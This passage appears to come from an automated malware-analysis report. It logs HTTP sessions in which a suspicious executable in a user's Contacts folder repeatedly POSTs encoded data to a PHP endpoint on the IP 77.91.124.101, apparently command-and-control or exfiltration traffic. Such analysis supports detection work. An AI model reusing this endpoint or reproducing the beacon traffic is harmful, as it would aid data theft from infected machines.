                                                            Data Ascii: RZXQ^YZ_]WUWU_WSPRXCVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)%_<:*#,72 >)3S'."R0295(?\,>&G''^)#
                                                            Nov 21, 2023 04:48:12.086941957 CET439INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7192.168.2.54971977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:31.019237995 CET171OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:31.220777988 CET171INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:31.221050024 CET173OUTData Raw: 52 58 58 51 5b 52 5a 58 5d 57 55 57 55 5a 57 55 50 5c 58 44 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXXQ[RZX]WUWUZWUP\XDVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)=_=(=? ?8'5 1?U*$.S&3>,(6($8.&G''^)7
                                                            Nov 21, 2023 04:47:31.425097942 CET174INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:31 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            777.91.124.10180192.168.2.549719C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:31.019237995 CET171OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:31.220777988 CET171INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:31.221050024 CET173OUTData Raw: 52 58 58 51 5b 52 5a 58 5d 57 55 57 55 5a 57 55 50 5c 58 44 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXXQ[RZX]WUWUZWUP\XDVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)=_=(=? ?8'5 1?U*$.S&3>,(6($8.&G''^)7
                                                            Nov 21, 2023 04:47:31.425097942 CET174INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:31 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            70192.168.2.54978477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:12.409848928 CET440OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:12.607481956 CET440INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:12.607781887 CET443OUTData Raw: 57 5c 58 50 5b 52 5a 51 5d 57 55 57 55 5c 57 5a 50 53 58 41 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\XP[RZQ]WUWU\WZPSXAVVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'])+.?.T?##,'5#1<%0["0!-%(<<,&G''^)/
                                                            Nov 21, 2023 04:48:12.810369015 CET443INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:12 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7077.91.124.10180192.168.2.549784C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:12.409848928 CET440OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:12.607481956 CET440INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:12.607781887 CET443OUTData Raw: 57 5c 58 50 5b 52 5a 51 5d 57 55 57 55 5c 57 5a 50 53 58 41 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\XP[RZQ]WUWU\WZPSXAVVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'])+.?.T?##,'5#1<%0["0!-%(<<,&G''^)/
                                                            Nov 21, 2023 04:48:12.810369015 CET443INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:12 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            71192.168.2.54978577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:13.128065109 CET444OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:13.326134920 CET444INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:13.326483011 CET447OUTData Raw: 57 5c 5d 5d 5e 5a 5f 59 5d 57 55 57 55 5a 57 51 50 5c 58 46 56 56 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\]]^Z_Y]WUWUZWQP\XFVVWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X=8)Y(+*T* #.72#>(#)0=' -+=+,&G''^)7
                                                            Nov 21, 2023 04:48:13.528403044 CET447INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:13 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7177.91.124.10180192.168.2.549785C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:13.128065109 CET444OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:13.326134920 CET444INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:13.326483011 CET447OUTData Raw: 57 5c 5d 5d 5e 5a 5f 59 5d 57 55 57 55 5a 57 51 50 5c 58 46 56 56 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\]]^Z_Y]WUWUZWQP\XFVVWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X=8)Y(+*T* #.72#>(#)0=' -+=+,&G''^)7
                                                            Nov 21, 2023 04:48:13.528403044 CET447INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:13 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            72192.168.2.54978677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:13.848887920 CET448OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:14.051969051 CET450INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:14.052304029 CET452OUTData Raw: 52 5b 5d 5e 5e 58 5a 5e 5d 57 55 57 55 57 57 53 50 58 58 43 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]^^XZ^]WUWUWWSPXXCVQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)+!X<(9*#7/B- :(#P3->R$2W:!<,88&G''^)
                                                            Nov 21, 2023 04:48:14.254933119 CET461INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:13 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7277.91.124.10180192.168.2.549786C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:13.848887920 CET448OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:14.051969051 CET450INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:14.052304029 CET452OUTData Raw: 52 5b 5d 5e 5e 58 5a 5e 5d 57 55 57 55 57 57 53 50 58 58 43 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]^^XZ^]WUWUWWSPXXCVQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)+!X<(9*#7/B- :(#P3->R$2W:!<,88&G''^)
                                                            Nov 21, 2023 04:48:14.254933119 CET461INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:13 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7377.91.124.10180192.168.2.549788C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:14.724189043 CET462OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:14.922880888 CET462INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:14.923093081 CET465OUTData Raw: 57 5f 58 59 5b 5f 5f 59 5d 57 55 57 55 5d 57 52 50 5e 58 45 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_XY[__Y]WUWU]WRP^XEVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^*;-Z?;*V=,2#)9_)0*R0"W'9-8*</&G''^)+
                                                            Nov 21, 2023 04:48:15.129034042 CET465INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:14 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            73192.168.2.54978877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:14.724189043 CET462OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:14.922880888 CET462INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:14.923093081 CET465OUTData Raw: 57 5f 58 59 5b 5f 5f 59 5d 57 55 57 55 5d 57 52 50 5e 58 45 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_XY[__Y]WUWU]WRP^XEVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^*;-Z?;*V=,2#)9_)0*R0"W'9-8*</&G''^)+
                                                            Nov 21, 2023 04:48:15.129034042 CET465INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:14 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7477.91.124.10180192.168.2.549789C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:16.791912079 CET466OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:16.989553928 CET466INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:17.181687117 CET467INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:16 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            74192.168.2.54978977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:16.791912079 CET466OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:16.989553928 CET466INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:17.181687117 CET467INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:16 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            75192.168.2.54979077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:17.179908991 CET467OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1396
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:17.377446890 CET468INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:17.377918959 CET470OUTData Raw: 57 50 58 51 5e 5e 5f 5c 5d 57 55 57 55 5e 57 5b 50 59 58 48 56 56 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WPXQ^^_\]WUWU^W[PYXHVVW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*=X<(2R=# ;54:Y?3"V'1'%,;?->&G''^)
                                                            Nov 21, 2023 04:48:17.580379963 CET473INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:17 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 1f 26 3f 23 05 34 33 23 55 3c 3a 32 0b 2e 2e 25 1b 3f 20 29 11 32 3d 28 5f 27 29 3d 50 3c 2f 30 11 30 39 2c 51 37 18 0a 11 2a 20 21 5a 0c 1d 26 15 35 28 23 55 3c 07 3b 03 3c 2d 0e 5c 32 21 01 5c 2b 07 3f 16 34 0d 09 1f 31 0a 3b 0b 2f 59 21 5f 3a 01 2e 44 27 2c 31 01 34 17 23 5f 0c 14 27 18 35 0f 20 02 22 30 29 09 23 37 1a 14 23 37 27 1f 30 3d 0d 0e 26 5e 21 14 3c 38 38 52 31 09 06 51 27 29 2b 1d 31 00 23 13 3c 00 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "&?#43#U<:2..%? )2=(_')=P</009,Q7* !Z&5(#U<;<-\2!\+?41;/Y!_:.D',14#_'5 "0)#7#7'0=&^!<88R1Q')+1#<&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7577.91.124.10180192.168.2.549790C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:17.179908991 CET467OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1396
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:17.377446890 CET468INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:17.377918959 CET470OUTData Raw: 57 50 58 51 5e 5e 5f 5c 5d 57 55 57 55 5e 57 5b 50 59 58 48 56 56 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
